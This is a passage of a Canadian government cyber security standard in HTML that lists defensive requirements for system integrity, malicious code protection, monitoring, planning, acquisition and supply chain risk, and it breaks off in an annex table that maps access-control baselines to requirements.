and system error handling. Organizations can take advantage of available resources (e.g., <abbr title="Common Weakness Enumeration">CWE</abbr> or <abbr title="Common Vulnerabilities and Exposures">CVE</abbr> databases) when remediating system flaws. Organization-defined time periods for updating security-relevant software and firmware may vary based on a variety of factors, including the criticality of the update (i.e., severity of the vulnerability related to the discovered flaw). Some types of flaw remediation may require more testing than other types.</p> <h5>References</h5> <p>Source control: SI-02<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/40/r4/final">NIST SP 800-40 Guide to Enterprise Patch Management Planning: Preventive Maintenance for Technology </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/128/upd1/final">NIST SP 800-128 Guide for Security-Focused Configuration Management of Information Systems </a></li> </ul></details><details><summary><h4 id="03-14-02">03.14.02 Malicious code protection</h4> </summary><ol class="lst-upr-alph"><li>Implement malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code</li> <li>Update malicious code protection mechanisms as new releases are available in accordance with configuration management policies and procedures</li> <li>Configure malicious code protection mechanisms to: <ol><li>perform scans of the system [assignment: organization-defined frequency] and real-time scans of files from external sources at endpoints or system entry and exit points as the files are downloaded, opened, or executed</li> <li>block or quarantine malicious code, or take other mitigation actions in response to malicious code detection</li> </ol></li> </ol><h5>Discussion</h5> <p>Malicious code insertions occur through the exploitation of system vulnerabilities. Malicious code can be inserted into the system in a variety of ways, including email, the Internet, and portable storage devices. Malicious code includes viruses, worms, Trojan horses, and spyware. Malicious code can be encoded in various formats, contained in compressed or hidden files, or hidden in files using techniques such as steganography. Malicious code may be present in commercial off-the-shelf software and custom-built software and could include logic bombs, backdoors, and other types of attacks that could affect organizational mission and business functions. Periodic scans of the system and real-time scans of files from external sources as files are downloaded, opened, or executed can detect malicious code. Malicious code protection mechanisms can also monitor systems for anomalous or unexpected behaviours and take appropriate actions.</p> <p>Malicious code protection mechanisms include signature- and non-signature-based technologies. Non-signature-based detection mechanisms include artificial intelligence (AI) techniques that use heuristics to detect, analyze, and describe the characteristics or behaviour of malicious code. They also provide controls against such code for which signatures do not yet exist or for which existing signatures may not be effective. Malicious code for which active signatures do not yet exist or may be ineffective includes polymorphic malicious code (i.e., code that changes signatures when it replicates). Non-signature-based mechanisms include reputation-based technologies. Pervasive configuration management, anti-exploitation software, and software integrity controls may also be effective in preventing unauthorized code execution.</p> <p>If malicious code cannot be detected by detection methods or technologies, organizations can rely on secure coding practices, configuration management and control, trusted procurement processes, and monitoring practices to help ensure that the software only performs intended functions. Organizations may determine that different actions are warranted in response to the detection of malicious code. For example, organizations can define actions to be taken in response to the detection of malicious code during scans, malicious downloads, or malicious activity when attempting to open or execute files.</p> <h5>References</h5> <p>Source control: SI-03<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/protect-your-organization-malware-itsap00057">Cyber Centre Protect your organization from malware (ITSAP.00.057)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/spotting-malicious-email-messages-itsap00100">Cyber Centre Spotting malicious email messages (ITSAP.00.100)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/83/r1/final">NIST SP 800-83 Guide to Malware Incident Prevention and Handling for Desktops and Laptops</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/125/b/final">NIST SP 800-125B Secure Virtual Network Configuration for Virtual Machine (VM) Protection</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/177/r1/final">NIST SP 800-177 Trustworthy Email</a></li> </ul></details><details><summary><h4 id="03-14-03">03.14.03 Security alerts, advisories, and directives</h4> </summary><ol class="lst-upr-alph"><li>Receive system security alerts, advisories, and directives from external organizations on an ongoing basis</li> <li>Generate and disseminate internal system security alerts, advisories, and directives, as necessary</li> </ol><h5>Discussion</h5> <p>There are many publicly available sources of system security alerts and advisories. For example, the Canadian Centre for Cyber Security (Cyber Centre) generates security alerts and advisories to maintain situational awareness across the <abbr title="Government of Canada">GC</abbr> and in non-<abbr title="Government of Canada">GC</abbr> organizations. Software vendors, subscription services, and industry Information Sharing and Analysis Centres (ISACs) may also provide security alerts and advisories. Compliance with security directives is essential due to the critical nature of many of these directives and the potential immediate adverse effects on organizational operations and assets, individuals, other organizations, and Canada should the directives not be implemented in a timely manner.</p> <h5>References</h5> <p>Source control: SI-05<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</a></p> </details><h4 id="03-14-04">03.14.04 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-14-05">03.14.05 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-14-06">03.14.06 System monitoring</h4> </summary><ol class="lst-upr-alph"><li>Monitor the system to detect: <ol><li>attacks and indicators of potential attacks</li> <li>unauthorized connections</li> </ol></li> <li>Identify unauthorized use of the system</li> <li>Monitor inbound and outbound communications traffic to detect unusual or unauthorized activities or conditions</li> </ol><h5>Discussion</h5> <p>System monitoring involves external and internal monitoring. Internal monitoring includes the observation of events that occur within the system. External monitoring includes the observation of events that occur at the system boundary. Organizations can monitor the system by observing audit record activities in real time or by observing other system aspects, such as access patterns, characteristics of access, and other actions. The monitoring objectives may guide determination of the events.</p> <p>A system monitoring capability is achieved through a variety of tools and techniques (e.g., audit record monitoring software, intrusion detection systems, intrusion prevention systems, malicious code protection software, scanning tools, network monitoring software). Strategic locations for monitoring devices include selected perimeter locations and near server farms that support critical applications with such devices being employed at managed system interfaces. The granularity of monitoring the information collected is based on organizational monitoring objectives and the capability of the system to support such objectives.</p> <p>Systems connections can be network, remote, or local. A network connection is any connection with a device that communicates through a network (e.g., local area network, the Internet). A remote connection is any connection with a device that communicates through an external network (e.g., the Internet). Network, remote, and local connections can be either wired or wireless.</p> <p>Unusual or unauthorized activities or conditions related to inbound and outbound communications traffic include internal traffic that indicates the presence of malicious code in the system or propagating among system components, the unauthorized export of information, or signaling to external systems. Evidence of malicious code is used to identify a potentially compromised system. System monitoring requirements, including the need for types of system monitoring, may be referenced in other requirements.</p> <h5>References</h5> <p>Source controls: SI-04, SI-04(04)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/61/r2/final">NIST SP 800-61 Computer Security Incident Handling Guide</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/83/r1/final">NIST SP 800-83 Guide to Malware Incident Prevention and Handling for Desktops and Laptops</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/92/final">NIST SP 800-92 Guide to Computer Security Log Management</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/94/final">NIST SP 800-94 Guide to Intrusion Detection and Prevention Systems (IDPS)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/137/final">NIST SP 800-137 Information Security Continuous Monitoring (ISCM) for Federal Information Systems and Organizations</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/177/r1/final">NIST SP 800-177 Trustworthy Email</a></li> </ul></details><h4 id="03-14-07">03.14.07 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-14-08">03.14.08 Information management and retention</h4> </summary><p>Manage and retain specified information within the system and specified information output from the system in accordance with applicable laws, Orders in Council, directives, regulations, policies, standards, guidelines, and operational requirements.</p> <h5>Discussion</h5> <p>Federal departments and agencies consider data retention requirements for non-federal organizations. Retaining specified information on non-federal systems after contracts or agreements have concluded increases the attack surface for those systems and the risk of the information being compromised. The Library and Archives Canada provides federal policy and guidance on records retention and schedules.</p> <h5>References</h5> <p>Source control: SI-12<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-14-09">03.14.09 Dedicated administration workstation</h4> </summary><ol class="lst-upr-alph"><li>Require any administrative or superuser actions to be performed from a physical workstation which is dedicated to those specific tasks and isolated from all other functions and networks, and especially from any form of internet access</li> <li>Remote connection of a <abbr title="dedicated administration workstation">DAW</abbr> to a target network is to use carrier private networks (e.g., virtual private LAN service (VPLS) or multiprotocol label switching (MPLS)) with <abbr title="virtual private network">VPN</abbr> encryption</li> <li>Use a dedicated and hardened single-purpose physical workstation or thin client as the <abbr title="dedicated administration workstation">DAW</abbr>, that is not shared between security realms</li> </ol><h5>Discussion</h5> <p>A dedicated administration workstation (DAW) is typically comprised of a user terminal with a very small selection of software designed for interfacing with the target system. For the purpose of this control, workstation means the system from which you are performing the administration, as opposed to the target system of administration. The <abbr title="dedicated administration workstation">DAW</abbr> must be hardened for the role, in order to minimize the likelihood that a superuser’s or administrator’s endpoint may be compromised by any threat actor (which would logically lead to the compromise of the target system). Typical office productivity tools are not required on the <abbr title="dedicated administration workstation">DAW</abbr>. All non-essential applications and services are removed. <abbr title="dedicated administration workstation">DAW</abbr>s are not domain-joined, cannot download patches from the internet, and cannot update documentation in networked applications.</p> <p>Removing public Internet access from administrative workstations substantially reduces risk of compromise. Internet-exposed <abbr title="virtual private network">VPN</abbr> gateways are not preferred for remote administration, private carriers provide better protection, but still require <abbr title="virtual private network">VPN</abbr> encryption within that network. The <abbr title="dedicated administration workstation">DAW</abbr> must not become a means of moving laterally between security realms.</p> <h5>References</h5> <p>Source controls: SI-400, SI-400(02), SI-400(05)<br /> Supporting publications: None</p> </details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-15">3.15 Planning</h3> <p>The Planning controls and assurance activities deal with the development, documentation, update, and implementation of security and privacy plans for organizational systems. Those plans describe the security and privacy controls and assurance activities in place or planned for the systems, and the rules of behaviour for individuals accessing the systems.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-15-01">03.15.01 Policy and procedures</a></li> <li><a href="#03-15-02">03.15.02 System security plan</a></li> <li><a href="#03-15-03">03.15.03 Rules of behaviour</a></li> </ul> </section>–> <details><summary><h4 id="03-15-01">03.15.01 Policy and procedures</h4> </summary><ol class="lst-upr-alph"><li>Develop, document, and disseminate to organizational personnel or roles, policies and procedures needed to satisfy the security requirements for the protection of specified information</li> <li>Review and update policies and procedures [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>This requirement addresses policies and procedures for the protection of specified information. Policies and procedures contribute to security assurance and should address each family of the specified information security requirements. Policies can be included as part of the organizational security policy or be represented by separate policies that address each family of requirements. Procedures describe how policies are implemented and can be directed at the individual or role that is the object of the procedure. Procedures can be documented in system security plans or in one or more separate documents.</p> <h5>References</h5> <p>Source controls: AC-01, AT-01, AU-01, CA-01, CM-01, IA-01, IR-01, MA-01, MP-01, PE-01, PL-01, PS-01, RA-01, SA-01, SC-01, SI-01, SR-01<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/12/r1/final">NIST SP 800-12 An Introduction to Information Security</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/100/upd1/final">NIST SP 800-100 Information Security Handbook</a></li> </ul></details><details><summary><h4 id="03-15-02">03.15.02 System security plan</h4> </summary><ol class="lst-upr-alph"><li>Develop a system security and privacy plan that: <ol><li>defines the constituent system components</li> <li>identifies the information types processed, stored, and transmitted by the system</li> <li>describes specific threats to the system that are of concern to the organization</li> <li>describes the operational environment for the system and any dependencies on or connections to other systems or system components</li> <li>provides an overview of the security requirements for the system</li> <li>describes the safeguards in place or planned for meeting the security requirements</li> <li>identifies individuals that fulfill system roles and responsibilities</li> <li>includes other relevant information necessary for the protection of specified information</li> </ol></li> <li>Review and update the system security plan [Assignment: organization-defined frequency]</li> <li>Protect the system security plan from unauthorized disclosure</li> </ol><h5>Discussion</h5> <p>System security and privacy plans provide key characteristics of the system that is processing, storing, and transmitting specified information and how the system and information are protected. System security and privacy plans contain sufficient information to facilitate a design and implementation that are unambiguously compliant with the intent of the plans and the subsequent determinations of risk if the plan is implemented as intended. System security and privacy plans can be a collection of documents, including documents that already exist. Effective system security plans make use of references to policies, procedures, and additional documents (e.g., design specifications) where detailed information can be obtained. This reduces the documentation requirements associated with security programs and maintains security information in other established management or operational areas related to enterprise architecture, the system development life cycle, systems engineering, and acquisition.</p> <h5>References</h5> <p>Source control: PL-02<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/18/r1/final">NIST SP 800-18 Guide for Developing Security Plans for Federal Information Systems</a></li> </ul></details><details><summary><h4 id="03-15-03">03.15.03 Rules of behaviour</h4> </summary><ol class="lst-upr-alph"><li>Establish, rules that describe the responsibilities and expected behaviour for system usage and protecting specified information</li> <li>Provide rules to individuals who require access to the system</li> <li>Receive a documented acknowledgement from individuals indicating that they have read, understand, and agree to abide by the rules of behaviour before authorizing access to specified information and the system</li> <li>Review and update the rules of behaviour [Assignment: organization-defined frequency]</li> </ol><h5>Discussion</h5> <p>Rules of behaviour represent a type of access agreement for system users. Organizations consider rules of behaviour for the handling of specified information based on individual user roles and responsibilities and differentiate between rules that apply to privileged users and rules that apply to general users.</p> <h5>References</h5> <p>Source control: PL-04<br /> Supporting publications:</p> <ul><li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/18/r1/final">NIST SP 800-18 Guide for Developing Security Plans for Federal Information Systems</a></li> </ul></details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-16">3.16 System and services acquisition</h3> <p>The System and services acquisition controls deal with the contracting of products and services required to support the implementation and operation of organizational systems. They ensure that sufficient resources are allocated for the protection of organizational systems, and they support system development lifecycle processes that incorporate security considerations.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-16-01">03.16.01 Security engineering principles</a></li> <li><a href="#03-16-02">03.16.02 Unsupported system components</a></li> <li><a href="#03-16-03">03.16.03 External system services</a></li> </ul> </section>–> <details><summary><h4 id="03-16-01">03.16.01 Security engineering principles</h4> </summary><p>Apply the following systems security engineering principles to the development or modification of the system and system components: [Assignment: organization-defined systems security engineering principles].</p> <h5>Discussion</h5> <p>Organizations apply systems security engineering principles to new development systems. For legacy systems, organizations apply systems security engineering principles to system modifications to the extent feasible, given the current state of hardware, software, and firmware components. The application of systems security engineering principles helps to develop trustworthy, secure, and resilient systems and reduce the susceptibility of organizations to disruptions, hazards, and threats. Examples include developing layered protections; establishing security policies, architectures, and controls as the foundation for system design; incorporating security requirements into the system development life cycle; delineating physical and logical security boundaries; ensuring that developers are trained on how to build trustworthy secure software; and performing threat modeling to identify use cases, threat agents, attack vectors and patterns, design patterns, and compensating controls needed to mitigate risk. Organizations that apply security engineering principles can facilitate the development of trustworthy, secure systems, system components, and system services; reduce risks to acceptable levels; and make informed risk-management decisions.</p> <h5>References</h5> <p>Source control: SA-08<br /> Supporting publications:</p> <ul><li>Cyber Centre System lifecycle cyber security and privacy risk management activities (ITSP.10.037)</li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v2/r1/final">NIST SP 800-160-2 Developing Cyber-Resilient Systems: A Systems Security Engineering Approach</a></li> </ul></details><details><summary><h4 id="03-16-02">03.16.02 Unsupported system components</h4> </summary><ol class="lst-upr-alph"><li>Replace system components when support for the components is no longer available from the developer, vendor, or manufacturer</li> <li>Provide options for risk mitigation or alternative sources for continued support for unsupported components if components cannot be replaced</li> </ol><h5>Discussion</h5> <p>Support for system components includes software patches, firmware updates, replacement parts, and maintenance contracts. An example of unsupported components includes when vendors no longer provide critical software patches or product updates, which can result in opportunities for adversaries to exploit weaknesses or deficiencies in the installed components. Exceptions to replacing unsupported system components include systems that provide critical mission or business capabilities when newer technologies are unavailable or when the systems are so isolated that installing replacement components is not an option.</p> <p>Alternative sources of support address the need to provide continued support for system components that are no longer supported by the original manufacturers, developers, or vendors when such components remain essential to organizational mission and business functions. If necessary, organizations can establish in-house support by developing customized patches for critical software components or obtain the services of external providers who provide ongoing support for unsupported components through contractual relationships. Such contractual relationships can include open-source software value-added vendors. The increased risk of using unsupported system components can be mitigated by prohibiting the connection of such components to public or uncontrolled networks or implementing other forms of isolation.</p> <h5>References</h5> <p>Source control: SA-22<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-16-03">03.16.03 External system services</h4> </summary><ol class="lst-upr-alph"><li>Require the providers of external system services used for the processing, storage, or transmission of specified information, to comply with the following security requirements: [Assignment: organization-defined security requirements]</li> <li>Define and document user roles and responsibilities with regard to external system services including shared responsibilities with external service providers</li> <li>Implement processes, methods, and techniques to monitor security requirement compliance by external service providers on an ongoing basis</li> </ol><h5>Discussion</h5> <p>External system services are provided by external service providers. Organizations establish relationships with external service providers in a variety of ways, including through business partnerships, contracts, interagency agreements, lines of business arrangements, licensing agreements, joint ventures, and supply chain exchanges. The responsibility for managing risks from the use of external system services remains with the organization charged with protecting specified information. Service-level agreements define expectations of performance, describe measurable outcomes, and identify remedies, mitigations, and response requirements for instances of noncompliance. Information from external service providers regarding the specific functions, ports, protocols, and services used in the provision of such services can be useful when there is a need to understand the trade-offs involved in restricting certain functions and services or blocking certain ports and protocols. This requirement is related to <a href="#03-01-20">Use of external systems 03.01.20</a>.</p> <h5>References</h5> <p>Source control: SA-09<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations </a></li> </ul></details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-17">3.17 Supply chain risk management</h3> <p>The Supply chain risk management controls support the mitigation of cyber security risks throughout all phases of the supply chain.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-17-01">03.17.01 Supply chain risk management plan</a></li> <li><a href="#03-17-02">03.17.02 Acquisition strategies, tools, and methods</a></li> <li><a href="#03-17-03">03.17.03 Supply chain requirements and processes</a></li> </ul> </section>–> <details><summary><h4 id="03-17-01">03.17.01 Supply chain risk management plan</h4> </summary><ol class="lst-upr-alph"><li>Develop a plan for managing supply chain risks associated with the research, development, design, manufacturing, acquisition, delivery, integration, operations, maintenance, and disposal of the system, system components, or system services</li> <li>Review and update the supply chain risk management plan [Assignment: organization-defined frequency]</li> <li>Protect the supply chain risk management plan from unauthorized disclosure</li> </ol><h5>Discussion</h5> <p>Dependence on the products, systems, and services of external providers and the nature of the relationships with those providers present an increasing level of risk to an organization. Threat actions that may increase security or privacy risks include unauthorized production, the insertion or use of counterfeits, tampering, poor manufacturing and development practices in the supply chain, theft, and the insertion of malicious software, firmware, and hardware. Supply chain risks can be endemic or systemic within a system, component, or service. Managing supply chain risks is a complex, multifaceted undertaking that requires a coordinated effort across an organization to build trust relationships and communicate with internal and external stakeholders.</p> <p>Supply chain risk management (SCRM) activities include identifying and assessing risks, determining appropriate risk response actions, developing <abbr title="supply chain risk management">SCRM</abbr> plans to document response actions, and monitoring performance against the plans. The system-level <abbr title="supply chain risk management">SCRM</abbr> plan is implementation-specific and provides policy implementation, requirements, constraints, and implications. It can either be stand-alone or incorporated into system security and privacy plans. The <abbr title="supply chain risk management">SCRM</abbr> plan addresses the management, implementation, and monitoring of <abbr title="supply chain risk management">SCRM</abbr> controls and the development or sustainment of systems across the system development life cycle to support mission and business functions. Because supply chains can differ significantly across and within organizations, <abbr title="supply chain risk management">SCRM</abbr> plans are tailored to individual program, organizational, and operational contexts.</p> <h5>References</h5> <p>Source control: SR-02<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1)</a></li> <li>Cyber Centre Organizational cyber security and privacy risk management activities (ITSP.10.036)</li> <li><a href="https://www.cyber.gc.ca/en/guidance/protecting-your-organization-software-supply-chain-threats-itsm10071">Cyber Centre Protecting your organization from software supply chain threats (ITSM.10.071)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-supply-chain-approach-assessing-risk-itsap10070">Cyber Centre Cyber supply chain: An approach to assessing risk (ITSAP.10.070)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/supply-chain-security-small-and-medium-sized-organizations-itsap00070">Cyber Centre Supply chain security for small and medium-sized organizations (ITSAP.00.070)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final">NIST SP 800-160-1 Engineering Trustworthy Secure Systems</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/181/r1/final">NIST SP 800-181 Workforce Framework for Cybersecurity (NICE Framework)</a></li> </ul></details><details><summary><h4 id="03-17-02">03.17.02 Acquisition strategies, tools, and methods</h4> </summary><p>Develop and implement acquisition strategies, contract tools, and procurement methods to identify, protect against, and mitigate supply chain risks.</p> <h5>Discussion</h5> <p>The acquisition process provides an important vehicle for protecting the supply chain. There are many useful tools and techniques available, including obscuring the end use of a system or system component, using blind purchases, requiring tamper-evident packaging, or using trusted or controlled distribution. The results from a supply chain risk assessment can inform the strategies, tools, and methods that are most applicable to the situation. Tools and techniques may provide protections against unauthorized production, theft, tampering, the insertion of counterfeits, the insertion of malicious software or backdoors, and poor development practices throughout the system life cycle.</p> <p>Organizations also consider providing incentives for suppliers to implement controls, promote transparency in their processes and security practices, provide contract language that addresses the prohibition of tainted or counterfeit components, and restrict purchases from untrustworthy suppliers. Organizations consider providing training, education, and awareness programs for personnel regarding supply chain risks, available mitigation strategies, and when the programs should be employed. Methods for reviewing and protecting development plans, documentation, and evidence are commensurate with the security requirements of the organization. Contracts may specify documentation protection requirements.</p> <h5>References</h5> <p>Source control: SR-05<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations </a></li> </ul></details><details><summary><h4 id="03-17-03">03.17.03 Supply chain requirements and processes</h4> </summary><ol class="lst-upr-alph"><li>Establish a process for identifying and addressing weaknesses or deficiencies in the supply chain elements and processes</li> <li>Enforce the following security requirements to protect against supply chain risks to the system, system components, or system services and to limit the harm or consequences from supply chain-related events: [Assignment: organization-defined security requirements]</li> </ol><h5>Discussion</h5> <p>Supply chain elements include organizations, entities, or tools that are employed for the research, development, design, manufacturing, acquisition, delivery, integration, operations, maintenance, and disposal of systems and system components. Supply chain processes include hardware, software, firmware, and systems development processes; shipping and handling procedures; physical security programs; personnel security programs; configuration management tools, techniques, and measures to maintain provenance; or other programs, processes, or procedures associated with the development, acquisition, maintenance, and disposal of systems and system components. Supply chain elements and processes may be provided by organizations, system integrators, or external providers. Weaknesses or deficiencies in supply chain elements or processes represent potential vulnerabilities that can be exploited by adversaries to harm the organization and affect its ability to carry out its core missions or business functions.</p> <h5>References</h5> <p>Source control: SR-03<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/tools-services/harmonized-tra-methodology">CSE-<abbr title="Royal Canadian Mounted Police">RCMP</abbr> Harmonized Threat and Risk Assessment Methodology (TRA-1) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations </a></li> </ul></details></section></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 class="text-info" id="AA">Annex A Tailoring criteria</h2> <section><h3>In this section</h3> <ul class="list-unstyled"><li><a href="#tab1">Table 1: Access control (AC)</a></li> <li><a href="#tab2">Table 2: Awareness and training (AT)</a></li> <li><a href="#tab3">Table 3: Audit and accountability (AU)</a></li> <li><a href="#tab4">Table 4: Assessment, authorization, and monitoring (CA)</a></li> <li><a href="#tab5">Table 5: Configuration management (CM)</a></li> <li><a href="#tab6">Table 6: Contingency planning (CP)</a></li> <li><a href="#tab7">Table 7: Identification and Authentication (IA)</a></li> <li><a href="#tab8">Table 8: Incident Response (IR)</a></li> <li><a href="#tab9">Table 9: Maintenance (MA)</a></li> <li><a href="#tab10">Table 10: Media protection (MP)</a></li> <li><a href="#tab11">Table 11: Physical and environmental protection (PE)</a></li> <li><a href="#tab12">Table 12: Planning (PL)</a></li> <li><a href="#tab13">Table 13: Program management (PM)</a></li> <li><a href="#tab14">Table 14: Personnel security (PS)</a></li> <li><a href="#tab15">Table 15: Personal information handling and transparency (PT)</a></li> <li><a href="#tab16">Table 16: Risk assessment (RA)</a></li> <li><a href="#tab17">Table 17: System and services acquisition (SA)</a></li> <li><a href="#tab18">Table 18: System and communications protection (SC)</a></li> <li><a href="#tab19">Table 19: System and information integrity (SI)</a></li> <li><a href="#tab20">Table 20: Supply chain risk management (SR)</a></li> </ul></section><p>This appendix describes the security control tailoring criteria used to develop the specified information security requirements. Table 1 through Table 20 specify the tailoring actions applied to the controls in the ITSP.10.033-01 medium impact baseline to obtain the security requirements in section 3. The controls, assurances activities and enhancements are hyperlinked to their corresponding entry in ITSP.10.033<!–when published–>.</p> <p>The security control tailoring criteria are the following:</p> <ul><li>NCO: the control is not directly related to protecting the confidentiality of specified information</li> <li><abbr title="Government of Canada">GC:</abbr> the control is primarily the responsibility of the Government of Canada</li> <li>ORC: the outcome of the control related to protecting the confidentiality of specified information is adequately covered by other related controls</li> <li>N/A: the control is not applicable</li> <li>C: the control is directly related to protecting the confidentiality of specified information</li> </ul><div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab1"><caption>Table 1: Access control (AC)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>AC-01</td> <td>Access control policy and procedures </td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>AC-02</td> <td>Account management</td> <td>C</td> <td><a href="#03-01-01">Account management 03.01.01</a></td> </tr><tr><td>AC-02(01)</td> <td>Account management: Automated system account management</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-02(02)</td> <td>Account management: Automated temporary and emergency account management</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-02(03)</td> <td>Account management: Disable accounts</td> <td>C</td> <td><a href="#03-01-01">Account management 03.01.01</a></td> </tr><tr><td>AC-02(04)</td> <td>Account management: Automated audit actions</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-02(05)</td> <td>Account management: Inactivity logout</td> <td>C</td> <td><a href="#03-01-01">Account management 03.01.01</a></td> </tr><tr><td>AC-02(07)</td> <td>Account management: Privileged user accounts</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-02(13)</td> <td>Account management: Disable accounts for high-risk individuals</td> <td>C</td> <td><a href="#03-01-01">Account management 03.01.01</a></td> </tr><tr><td>AC-03</td> <td>Access enforcement</td> <td>C</td> <td><a href="#03-01-02">Access enforcement 03.01.02</a></td> </tr><tr><td>AC-03(02)</td> <td>Access enforcement: Dual authorization</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-03(04)</td> <td>Access enforcement: Discretionary access control</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-03(09)</td> <td>Access enforcement: Controlled release</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-04</td> <td>Information flow enforcement</td> <td>C</td> <td><a href="#03-01-03">Information flow enforcement 03.01.03</a></td> </tr><tr><td>AC-05</td> <td>Separation of duties</td> <td>C</td> <td><a href="#03-01-04">Separation of duties 03.01.04</a></td> </tr><tr><td>AC-06</td> <td>Least privilege</td> <td>C</td> <td><a href="#03-01-05">Least privilege 03.01.05</a></td> </tr><tr><td>AC-06(01)</td> <td>Least privilege: Authorize access to security functions</td> <td>C</td> <td><a href="#03-01-05">Least privilege 03.01.05</a></td> </tr><tr><td>AC-06(02)</td> <td>Least privilege: Non-privileged access for non-security functions</td> <td>C</td> <td><a href="#03-01-06">Least privilege – privileged accounts 03.01.06</a></td> </tr><tr><td>AC-06(05)</td> <td>Least privilege: Privileged accounts</td> <td>C</td> <td><a href="#03-01-06">Least privilege – privileged accounts 03.01.06</a></td> </tr><tr><td>AC-06(07)</td> <td>Least privilege: Review of user privileges</td> <td>C</td> <td><a href="#03-01-05">Least privilege 03.01.05</a></td> 